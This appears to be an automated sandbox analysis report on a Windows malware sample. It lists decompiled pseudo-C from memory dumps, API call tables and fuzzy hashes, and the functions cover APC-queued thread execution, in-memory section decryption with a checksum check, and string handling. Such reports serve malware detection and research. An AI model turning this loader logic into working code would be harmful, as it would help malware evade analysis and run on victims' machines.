                                                                                                                                                                                                                                                                                    							if(_t23 == 0) {
                                                                                                                                                                                                                                                                                    								asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x6e051e80
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e051e80
                                                                                                                                                                                                                                                                                    0x6e051e7b
                                                                                                                                                                                                                                                                                    0x6e051e48
                                                                                                                                                                                                                                                                                    0x6e051e1b
                                                                                                                                                                                                                                                                                    0x6e051edd

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(6E054188), ref: 6E051E26
                                                                                                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E051E3B
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051CA4: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E054198,6E051E74), ref: 6E051CBB
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E051CD0
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051CA4: GetLastError.KERNEL32(00000000), ref: 6E051CDB
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6E051CE5
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051CA4: CloseHandle.KERNEL32(00000000), ref: 6E051CEC
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051CA4: SetLastError.KERNEL32(00000000), ref: 6E051CF5
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(6E054188), ref: 6E051E8E
                                                                                                                                                                                                                                                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 6E051EA8
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 6E051EC4
                                                                                                                                                                                                                                                                                    • HeapDestroy.KERNEL32 ref: 6E051ED0
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2110400756-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 47a43843629dde8e66c623ed85faae1d5f2a3c36afb7ad3f26b45cbb322401d3
                                                                                                                                                                                                                                                                                    • Instruction ID: 6dc3f6860c878178266abd800aee5e8ef9d0146646279f67a536916a6bf74d57
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47a43843629dde8e66c623ed85faae1d5f2a3c36afb7ad3f26b45cbb322401d3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65214F71A00B05FBCB409FE9DA98B8A7BE8FB5A2A47200529F516D3248E7348925CB54
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E6E051CA4(long _a4, DWORD* _a12) {
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _v0;
                                                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                                                    				long _t6;
                                                                                                                                                                                                                                                                                    				long _t11;
                                                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e0541cc, 0, _a12); // executed
                                                                                                                                                                                                                                                                                    				_t13 = _t4;
                                                                                                                                                                                                                                                                                    				if(_t13 != 0) {
                                                                                                                                                                                                                                                                                    					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                                                                                                                                                                                    					if(_t6 == 0) {
                                                                                                                                                                                                                                                                                    						_t11 = GetLastError();
                                                                                                                                                                                                                                                                                    						TerminateThread(_t13, _t11);
                                                                                                                                                                                                                                                                                    						CloseHandle(_t13);
                                                                                                                                                                                                                                                                                    						_t13 = 0;
                                                                                                                                                                                                                                                                                    						SetLastError(_t11);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t13;
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E054198,6E051E74), ref: 6E051CBB
                                                                                                                                                                                                                                                                                    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E051CD0
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 6E051CDB
                                                                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 6E051CE5
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6E051CEC
                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 6E051CF5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3832013932-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 47d9b66441fd24d5981991a5dde4fb77335a57c3251e412dd7b22bd2a1aabfa3
                                                                                                                                                                                                                                                                                    • Instruction ID: 9296a742ad03ee691f7f910d3cd9013dbedaeb9851969717e081b4de30d78abb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47d9b66441fd24d5981991a5dde4fb77335a57c3251e412dd7b22bd2a1aabfa3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CF01237205F21BBDB125FE08E5CF5F7F69FB0E751F005404F60591155C72988259B95
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(80000002), ref: 00A734A3
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00A720DE), ref: 00A734E6
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00A734FA
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00A73508
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 617a9e885011238092397b4ba934a345f2053325cd8b9af003000d72447786db
                                                                                                                                                                                                                                                                                    • Instruction ID: 904cb61850ccab4ee7af071aa3aaafa28629158dc19d4650cad58b9dbd9e4270
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 617a9e885011238092397b4ba934a345f2053325cd8b9af003000d72447786db
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7312DB2910109EF8B05DF98DCC48AE7BB9FF58300B21C02EE50A97210E7359A86DF61
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                                                                    			E6E0515A3(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				unsigned int _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t77 =  *0x6e0541b0;
                                                                                                                                                                                                                                                                                    				_t39 = E6E051A4B(_t77,  &_v20,  &_v12);
                                                                                                                                                                                                                                                                                    				_v16 = _t39;
                                                                                                                                                                                                                                                                                    				if(_t39 == 0) {
                                                                                                                                                                                                                                                                                    					asm("sbb ebx, ebx");
                                                                                                                                                                                                                                                                                    					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                                                                                                                                                                                                                                                                    					_t78 = _t77 + _v20;
                                                                                                                                                                                                                                                                                    					_v36 = _t78;
                                                                                                                                                                                                                                                                                    					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                    					_v24 = _t46;
                                                                                                                                                                                                                                                                                    					if(_t46 == 0) {
                                                                                                                                                                                                                                                                                    						_v16 = 8;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t61 = 0;
                                                                                                                                                                                                                                                                                    						if(_t59 <= 0) {
                                                                                                                                                                                                                                                                                    							_t47 =  *0x6e0541cc;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t66 = _a4;
                                                                                                                                                                                                                                                                                    							_t50 = _t46 - _t78;
                                                                                                                                                                                                                                                                                    							_t11 = _t66 + 0x6e055137; // 0x6e055137
                                                                                                                                                                                                                                                                                    							_v28 = _t50;
                                                                                                                                                                                                                                                                                    							_v32 = _t50 + _t11;
                                                                                                                                                                                                                                                                                    							_v8 = _t78;
                                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                                                                    								_t19 = _t61 + 1; // 0x2
                                                                                                                                                                                                                                                                                    								_t80 = _t19;
                                                                                                                                                                                                                                                                                    								E6E051D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                                                                                                                                                                                                                                                                    								_t64 = _v32;
                                                                                                                                                                                                                                                                                    								_v8 = _v8 + 0x1000;
                                                                                                                                                                                                                                                                                    								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                                                                                                                                                                                                                                                                    								_t61 = _t80;
                                                                                                                                                                                                                                                                                    								 *0x6e0541cc = _t47;
                                                                                                                                                                                                                                                                                    								if(_t61 >= _t59) {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t50 = _v28;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_t47 != 0x63699bc3) {
                                                                                                                                                                                                                                                                                    							_v16 = 0xc;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							memcpy(_v36, _v24, _v12);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						VirtualFree(_v24, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                                                                    0x6e051610
                                                                                                                                                                                                                                                                                    0x6e051613
                                                                                                                                                                                                                                                                                    0x6e051615
                                                                                                                                                                                                                                                                                    0x6e05161d
                                                                                                                                                                                                                                                                                    0x6e051620
                                                                                                                                                                                                                                                                                    0x6e051623
                                                                                                                                                                                                                                                                                    0x6e05162b
                                                                                                                                                                                                                                                                                    0x6e051633
                                                                                                                                                                                                                                                                                    0x6e051634
                                                                                                                                                                                                                                                                                    0x6e051635
                                                                                                                                                                                                                                                                                    0x6e05163c
                                                                                                                                                                                                                                                                                    0x6e05163c
                                                                                                                                                                                                                                                                                    0x6e051650
                                                                                                                                                                                                                                                                                    0x6e051655
                                                                                                                                                                                                                                                                                    0x6e05165e
                                                                                                                                                                                                                                                                                    0x6e051665
                                                                                                                                                                                                                                                                                    0x6e051668
                                                                                                                                                                                                                                                                                    0x6e05166c
                                                                                                                                                                                                                                                                                    0x6e051671
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e051628
                                                                                                                                                                                                                                                                                    0x6e051628
                                                                                                                                                                                                                                                                                    0x6e051673
                                                                                                                                                                                                                                                                                    0x6e051680
                                                                                                                                                                                                                                                                                    0x6e051695
                                                                                                                                                                                                                                                                                    0x6e051682
                                                                                                                                                                                                                                                                                    0x6e05168b
                                                                                                                                                                                                                                                                                    0x6e051690
                                                                                                                                                                                                                                                                                    0x6e0516a6
                                                                                                                                                                                                                                                                                    0x6e0516a6
                                                                                                                                                                                                                                                                                    0x6e0516b5
                                                                                                                                                                                                                                                                                    0x6e0516bb

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E0515F9
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E0517EC), ref: 6E05168B
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E0516A6
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                                                                    • String ID: Mar 26 2021
                                                                                                                                                                                                                                                                                    • API String ID: 4010158826-2175073649
                                                                                                                                                                                                                                                                                    • Opcode ID: 1ac4e31586941b42839b5eef7a1995ac3f3b963105405e886860ef4bd8b82703
                                                                                                                                                                                                                                                                                    • Instruction ID: 0eeda2cde74c3d93092f81f949df5e8edfda03726d14f05a58b26e6fa8368cfd
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ac4e31586941b42839b5eef7a1995ac3f3b963105405e886860ef4bd8b82703
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31315E71E0060AAFDB01CFD9CA80BDEBBB9FF49304F148129D505A7345D771AA1A8B94
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                                                                                                                                                    			E00A75988(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                                                                    				int _t46;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                                                                                                                                    				int _t48;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t47 = __eax;
                                                                                                                                                                                                                                                                                    				_push( &_v12);
                                                                                                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                                                                                                    				_t39 = 0;
                                                                                                                                                                                                                                                                                    				_t46 = 0; // executed
                                                                                                                                                                                                                                                                                    				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                                                                                                    				_v8 = _t26;
                                                                                                                                                                                                                                                                                    				if(_t26 < 0) {
                                                                                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_v12 == 0) {
                                                                                                                                                                                                                                                                                    					Sleep(0xc8);
                                                                                                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_v8 >= _t39) {
                                                                                                                                                                                                                                                                                    					_t28 = _v12;
                                                                                                                                                                                                                                                                                    					if(_t28 != 0) {
                                                                                                                                                                                                                                                                                    						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                                                                                                                                                                    						_v8 = _t31;
                                                                                                                                                                                                                                                                                    						if(_t31 >= 0) {
                                                                                                                                                                                                                                                                                    							_t46 = lstrlenW(_v16);
                                                                                                                                                                                                                                                                                    							if(_t46 != 0) {
                                                                                                                                                                                                                                                                                    								_t46 = _t46 + 1;
                                                                                                                                                                                                                                                                                    								_t48 = _t46 + _t46;
                                                                                                                                                                                                                                                                                    								_t39 = E00A75C4E(_t48);
                                                                                                                                                                                                                                                                                    								if(_t39 == 0) {
                                                                                                                                                                                                                                                                                    									_v8 = 0x8007000e;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									memcpy(_t39, _v16, _t48);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								__imp__#6(_v16);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t32 = _v12;
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					 *_a4 = _t39;
                                                                                                                                                                                                                                                                                    					 *_a8 = _t46 + _t46;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L13;
                                                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000000C8), ref: 00A759B6
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00A759EC
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00A75A0D
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00A75A21
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                     • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1198164300-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1f93be9c2dffba11a72b64e1b680592e455c4cc942dfeedd9b326e553e34f5b2
                                                                                                                                                                                                                                                                                    • Instruction ID: b0f8762ce86bf14244ca926536232be0aec5bc5b4da952244e6a245cbf4d89d2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f93be9c2dffba11a72b64e1b680592e455c4cc942dfeedd9b326e553e34f5b2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22213975E00609EFCB11DFA8CD8899EBBB8FF49345B10C2A9E949E7210E7709A41CF50
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                                                                    			E6E051D32(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				long _t3;
                                                                                                                                                                                                                                                                                    				int _t4;
                                                                                                                                                                                                                                                                                    				int _t9;
                                                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t13 = GetCurrentThread();
                                                                                                                                                                                                                                                                                    				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                                                                                                                                                                                    				if(_t3 != 0) {
                                                                                                                                                                                                                                                                                    					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t4 = E6E0517A7(_a4); // executed
                                                                                                                                                                                                                                                                                    				_t9 = _t4;
                                                                                                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                                                                                                    					SetThreadPriority(_t13, _t4);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                                                    				return _t9;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6E051D35
                                                                                                                                                                                                                                                                                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E051D40
                                                                                                                                                                                                                                                                                    • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E051D53
                                                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E051D66
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1452675757-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e70e205ff66fa734b616a8f52886c601f2175cef0a42269e0416338c7111e960
                                                                                                                                                                                                                                                                                    • Instruction ID: 8ed72daee4dbcfbcbb80ce2e7c39b85b34c1c88262de071aa2489042e8aa3d9e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e70e205ff66fa734b616a8f52886c601f2175cef0a42269e0416338c7111e960
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09E09231315B112B97022AAD4D9CFAB7B9DDF973717020335F524D22D4DB588C2A89B5
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00A74A3C(void* __edx) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                                                                    				WCHAR* _v16;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                                                                    				intOrPtr _t24;
                                                                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                                                                                                    				intOrPtr _t35;
                                                                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t50 = __edx;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_t23 = E00A74380(0,  &_v8); // executed
                                                                                                                                                                                                                                                                                    				if(_t23 != 0) {
                                                                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t24 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    				_t4 = _t24 + 0xa7bd90; // 0x5569338
                                                                                                                                                                                                                                                                                    				_t5 = _t24 + 0xa7bd38; // 0x4f0053
                                                                                                                                                                                                                                                                                    				_t26 = E00A730AD( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                                                                                                                                                                    				_t45 = _t26;
                                                                                                                                                                                                                                                                                    				if(_t45 == 0) {
                                                                                                                                                                                                                                                                                    					StrToIntExW(_v16, 0,  &_v12);
                                                                                                                                                                                                                                                                                    					_t45 = 8;
                                                                                                                                                                                                                                                                                    					if(_v12 < _t45) {
                                                                                                                                                                                                                                                                                    						_t45 = 1;
                                                                                                                                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t32 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    						_t11 = _t32 + 0xa7bd84; // 0x556932c
                                                                                                                                                                                                                                                                                    						_t48 = _t11;
                                                                                                                                                                                                                                                                                    						_t12 = _t32 + 0xa7bd38; // 0x4f0053
                                                                                                                                                                                                                                                                                    						_t55 = E00A74DC8(_t11, _t12, _t11);
                                                                                                                                                                                                                                                                                    						_t59 = _t55;
                                                                                                                                                                                                                                                                                    						if(_t55 != 0) {
                                                                                                                                                                                                                                                                                    							_t35 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    							_t13 = _t35 + 0xa7bdce; // 0x30314549
                                                                                                                                                                                                                                                                                    							if(E00A75EC8(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
                                                                                                                                                                                                                                                                                    								_t61 =  *0xa7a2b4 - 6;
